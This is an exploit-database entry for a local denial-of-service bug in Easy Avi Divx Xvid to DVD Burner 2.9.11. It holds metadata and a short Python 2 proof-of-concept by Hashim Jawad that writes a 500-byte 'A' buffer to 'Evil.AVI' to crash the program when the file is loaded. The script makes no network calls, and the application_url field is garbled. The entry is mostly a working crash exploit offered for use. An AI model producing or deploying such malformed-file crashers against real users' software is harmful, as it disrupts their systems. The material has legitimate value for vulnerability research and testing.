[] NeoSense

Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service

Author: Hashim Jawad
type: dos
platform: windows
port: 
date_added: 2018-03-23 
date_updated: 2018-03-23 
verified: 0 
codes:  
tags: Denial of Service (DoS)
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comeasy_divx_to_dvd.exe

#!/usr/bin/python
###########################################################################################
# Exploit Title      : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author     : Hashim Jawad                                                       #
# Twitter            : @ihack4falafel                                                     #
# Author Website     : ihack4falafel[.]com                                                #
# Vendor Homepage    : http://www.divxtodvd.net/index.htm                                 #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe                      #
# Tested on OS       : Windows XP professional SP3                                        #
#                      Windows 10 professional 64-bit                                     #
# Steps to reproduce : Add Evil.AVI and BOOM!                                             #
###########################################################################################

buffer = "A" * 500

try:
	f=open("Evil.AVI","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"